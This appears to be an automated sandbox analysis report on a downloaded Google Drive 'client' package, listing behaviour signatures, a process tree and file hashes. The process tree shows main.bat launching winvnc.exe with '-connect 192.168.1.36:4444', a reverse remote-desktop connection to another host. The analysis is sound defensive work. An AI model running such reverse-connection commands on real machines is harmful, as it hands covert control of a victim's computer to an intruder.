Overview

overview

6

Static

static

1

URLScan

urlscan

1

https://drive.google...

windows10-2004-x64

6

Analysis

  • max time kernel
    96s
  • max time network
    100s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-08-2024 21:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://drive.google.com/drive/folders/1GzW-K5GWNA77wkqExFFXzCQEiXIM67HZ?usp=sharing

Score
6/10
discovery

Malware Config

Signatures

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 3 IoCs
    evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies registry class 63 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 58 IoCs
  • Suspicious use of FindShellTrayWindow 40 IoCs
  • Suspicious use of SendNotifyMessage 27 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://drive.google.com/drive/folders/1GzW-K5GWNA77wkqExFFXzCQEiXIM67HZ?usp=sharing
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3088
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc0b5646f8,0x7ffc0b564708,0x7ffc0b564718
      2⤵
        PID:3712
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
        2⤵
          PID:3964
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4748
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8
          2⤵
            PID:4416
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
            2⤵
              PID:5076
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
              2⤵
                PID:1092
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5468 /prefetch:8
                2⤵
                  PID:2308
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5468 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4536
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
                  2⤵
                    PID:1172
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4672 /prefetch:8
                    2⤵
                      PID:1340
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
                      2⤵
                        PID:1464
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 /prefetch:8
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2844
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:1
                        2⤵
                          PID:6108
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
                          2⤵
                            PID:6116
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5696 /prefetch:1
                            2⤵
                              PID:5228
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,3901535559651280967,6827951565872026298,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
                              2⤵
                                PID:5240
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:2964
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:4916
                                • C:\Windows\System32\rundll32.exe
                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                  1⤵
                                    PID:2688
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\client-20240806T213317Z-001\client\main.bat" "
                                    1⤵
                                      PID:4916
                                      • C:\Windows\system32\timeout.exe
                                        timeout /t 1
                                        2⤵
                                        • Delays execution with timeout.exe
                                        PID:4952
                                      • C:\Users\Admin\Downloads\client-20240806T213317Z-001\client\winvnc.exe
                                        winvnc.exe -run
                                        2⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        PID:716
                                      • C:\Users\Admin\Downloads\client-20240806T213317Z-001\client\winvnc.exe
                                        winvnc.exe -connect 192.168.1.36:4444
                                        2⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:2436
                                    • C:\Windows\SysWOW64\DllHost.exe
                                      C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
                                      1⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:5336
                                    • C:\Windows\explorer.exe
                                      C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
                                      1⤵
                                      • Modifies Internet Explorer settings
                                      • Modifies registry class
                                      • Suspicious behavior: AddClipboardFormatListener
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of FindShellTrayWindow
                                      PID:5380
                                      • C:\Windows\system32\mmc.exe
                                        "C:\Windows\system32\mmc.exe" "C:\Windows\system32\wf.msc"
                                        2⤵
                                        • Drops file in System32 directory
                                        • Suspicious behavior: GetForegroundWindowSpam
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of SetWindowsHookEx
                                        PID:5624
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\client-20240806T213317Z-001\client\main.bat" "
                                      1⤵
                                        PID:5852
                                        • C:\Windows\system32\timeout.exe
                                          timeout /t 1
                                          2⤵
                                          • Delays execution with timeout.exe
                                          PID:5904
                                        • C:\Users\Admin\Downloads\client-20240806T213317Z-001\client\winvnc.exe
                                          winvnc.exe -run
                                          2⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:6020
                                        • C:\Users\Admin\Downloads\client-20240806T213317Z-001\client\winvnc.exe
                                          winvnc.exe -connect 192.168.1.36:4444
                                          2⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:6028
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\client-20240806T213317Z-001\client\main.bat" "
                                        1⤵
                                          PID:3096
                                          • C:\Windows\system32\timeout.exe
                                            timeout /t 1
                                            2⤵
                                            • Delays execution with timeout.exe
                                            PID:4344
                                          • C:\Users\Admin\Downloads\client-20240806T213317Z-001\client\winvnc.exe
                                            winvnc.exe -run
                                            2⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:3292
                                          • C:\Users\Admin\Downloads\client-20240806T213317Z-001\client\winvnc.exe
                                            winvnc.exe -connect 192.168.1.36:4444
                                            2⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:944

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                          Filesize

                                          152B

                                          MD5

                                          111c361619c017b5d09a13a56938bd54

                                          SHA1

                                          e02b363a8ceb95751623f25025a9299a2c931e07

                                          SHA256

                                          d7be4042a1e3511b0dbf0ab5c493245e4ac314440a4ae0732813db01a21ef8bc

                                          SHA512

                                          fc16a4ad0b56899b82d05114d7b0ca8ee610cdba6ff0b6a67dea44faf17b3105109335359b78c0a59c9011a13152744a7f5d4f6a5b66ea519df750ef03f622b2

                                          Download Submit

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                          Filesize

                                          152B

                                          MD5

                                          983cbc1f706a155d63496ebc4d66515e

                                          SHA1

                                          223d0071718b80cad9239e58c5e8e64df6e2a2fe

                                          SHA256

                                          cc34b8f8e3f4bfe4c9a227d88f56ea2dd276ca3ac81df622ff5e9a8ec46b951c

                                          SHA512

                                          d9cf2ca46d9379902730c81e615a3eb694873ffd535c6bb3ded2dc97cdbbfb71051ab11a07754ed6f610f04285605b702b5a48a6cfda3ee3287230c41c9c45cd

                                          Download Submit

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                          Filesize

                                          1KB

                                          MD5

                                          741bbb2b05ba502b566f050e4f1265a7

                                          SHA1

                                          64ea44e3094c7b2d5e583efd2b63405874ba5bc5

                                          SHA256

                                          14d6cac7396d7525424b2108f3b43a890ba84ec2c38c43d45a376402b7ab1ee0

                                          SHA512

                                          fbe9e3c7b9731057a80cb6a420a1f63c01939a18602211805eb11092aed1973906c78bf90c0279be0f8356373742805f5eac03a7f08dddb1dccdd3791e9a4cc6

                                          Download Submit

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
                                          Filesize

                                          1KB

                                          MD5

                                          9516f857df4f8ace30ed4a76a7965ed2

                                          SHA1

                                          c9f6e5f42db244a775776243c7e45206aa979203

                                          SHA256

                                          8cc32a873154bc5fe20571a1713da09f6031838f39b036261cd3598aeab8c1c2

                                          SHA512

                                          2f8ec9b642c8dc2d528e613cae403d1aab919003354678a4a43389eed22480a6f4f69acbcbc0d302f4a89aedbd202ba095f757d1642a0c7c07cab57fc2f8279a

                                          Download Submit

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                          Filesize

                                          3KB

                                          MD5

                                          ce73c32baefd408e07183f37205accf7

                                          SHA1

                                          dfedb2e61d13e56485ae725a7aab8e7d1a432fec

                                          SHA256

                                          af10a98a049d755d04462fbcc44cfe876d333349dde9172f418b9384f6e460d1

                                          SHA512

                                          4a168b9f02c7b85c26b9498bf95c832b20be73255d8d619b993296b598642b3dca80af905812c0c2f4208444fed67199b8f711ec94a0078db0fb786ffb9ad298

                                          Download Submit

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                          Filesize

                                          6KB

                                          MD5

                                          52b2b663e91c58214f7ad0a03b9729d2

                                          SHA1

                                          14a21a1164d577673bd26d07e95928c491228983

                                          SHA256

                                          ba6f175e92511a8590e442fe316657f01b473155ca55ea4d278d95979a8f639b

                                          SHA512

                                          2aa70c8ca20883076d55b855886b7215e3f94b117e1aa6633e1e153f952f248b0a9a373fff5f2b3506af87c271753c53b3eca4a15fa89942d15c43730c81c827

                                          Download Submit

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                          Filesize

                                          6KB

                                          MD5

                                          85e552fc6f963b1a26d2c716ed585be8

                                          SHA1

                                          00da83a2a430d5295a9aded96253b54b8944a55f

                                          SHA256

                                          29f565792ae18c9fbef74f042ae763a1154841c92460f553f1ee849f137420f3

                                          SHA512

                                          342abadd2666ed5780132bd368db56d83e48e1bba93532bbc8e6f8417bfe9797757a7cc403791f793c9d879dd41209706ee2cf73195da7764d9e9bdc45ec94f0

                                          Download Submit

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                          Filesize

                                          6KB

                                          MD5

                                          0ff772098db1ea93328269627c7a5c1b

                                          SHA1

                                          570740251a3338881d55b5522be46f922d2f6608

                                          SHA256

                                          93d75a3aa465c4645ff022ae0dabbac3c953bf3436d5189b1d5d8cb0491d3235

                                          SHA512

                                          cb9dc5dfb629ff439a41570e90940133e52709784a4666bea76b7b4cd8b0f53e93711cc91daed274f716101f7d2cc1e0b283073f943af67268a6d55b2990a05d

                                          Download Submit

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
                                          Filesize

                                          1KB

                                          MD5

                                          4bcc11ad0be639ecda7ff90fafa385f6

                                          SHA1

                                          7b9e6594ceee2750fd0dee9bd5e260a2d6685843

                                          SHA256

                                          515aeadae30e22871993dd96312d510055d4d14b54132d9d8ce52bccfd6cc240

                                          SHA512

                                          2a733729c4092e07100fdc36fc3d07db977309905b12136730d801d71fedf2bc7098b1035efa48fa6a97569d96cad2c744b8d422b5e6b4bbbe348c5660c95f80

                                          Download Submit

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
                                          Filesize

                                          1KB

                                          MD5

                                          5e553cecf9cdc17ac4c7aa0da9661661

                                          SHA1

                                          7cf40930352f6683340834fa045621634c30885c

                                          SHA256

                                          0be502ede9141b8598afa885b755247d34d369033423627439aa7849c0445ca4

                                          SHA512

                                          90a6284d3c974b638b141ad3a95effba3b93f7a906cd569317b0ee6ebb62501df127daabc613faa2343069b3ad4ad84e65128e3d3efd51cfcebf50c565c23a23

                                          Download Submit

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe585119.TMP
                                          Filesize

                                          1KB

                                          MD5

                                          74833e862e39e00eaedb870183a173ba

                                          SHA1

                                          dcc571dd525bceb408b6516b4a4370b0e8acbb9b

                                          SHA256

                                          c4d2b94b8159203c7c17c707eb1a0410463a6807679d22d4c8799b98bc1d3f38

                                          SHA512

                                          86f0378ddcc2423d9c717aa41c98d052129a77b295e2a13b37b7b170cf31bfa098cebe781f60c603348d54bfe4c96af7b3c2858ffbbd4ef1dbb86ed4cd263112

                                          Download Submit

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                          Filesize

                                          16B

                                          MD5

                                          6752a1d65b201c13b62ea44016eb221f

                                          SHA1

                                          58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                          SHA256

                                          0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                          SHA512

                                          9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                          Download Submit

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                          Filesize

                                          11KB

                                          MD5

                                          5c6dacc44b83adccd56030cf598ddf61

                                          SHA1

                                          c64cf8dc540fa13eff634f259b953a6537cc6594

                                          SHA256

                                          c01ae2d58aa652f03d2b9c8a3882e9369db489c83a9f4a16b0e82b4b3cb3c624

                                          SHA512

                                          f20c4f41eb25f0624bd7d25ff7643c2f4854ffbfdf4effd6473931aa12aaf940a14779e616a153e18875aa4f11e7f2ed3b59767cae398aefb2d8cb6006da08c5

                                          Download Submit

                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                          Filesize

                                          11KB

                                          MD5

                                          0ddb76203b300e023e69cc57877f33a1

                                          SHA1

                                          cac193b460ae2ce461bc8da08bbda7fd68ee655a

                                          SHA256

                                          83cc085dc37ed7b92656a8c437a6f26ae4709750d5417d64c1086bd6bbbfc1f3

                                          SHA512

                                          d2e582f2d5cae5d3ee437d0971949fcdfba50367a9ba36618a895f2b8fdc36da7f47d4b8e3cc8fbb65175ea107e51168481dde5b660bbce4f3315394fec3f908

                                          Download Submit

                                        • C:\Users\Admin\Downloads\client-20240806T213317Z-001.zip
                                          Filesize

                                          1.0MB

                                          MD5

                                          776bdbf74bb84adf7db6beabd0d9f8f1

                                          SHA1

                                          cdda7140852cc7c180cbb13eb597377cbac70a18

                                          SHA256

                                          90f9427c8fd9a86af0a8dd96210fb037dd486ec19288c02173d23af620cca47e

                                          SHA512

                                          bbe934a97e9953472dcd769994b50e8eddd4a58712f157abfe8ada50943020c35fb82569312343b36c16e1e7b45c43f553ff53d2248dc9e0adcf9d2dc8b773fb

                                          Download Submit

                                        • memory/5624-214-0x000000001DBF0000-0x000000001E0D6000-memory.dmp

                                          Filesize

                                          4.9MB

                                          Download

                                        • memory/5624-215-0x000000001DB10000-0x000000001DB32000-memory.dmp

                                          Filesize

                                          136KB

                                          Download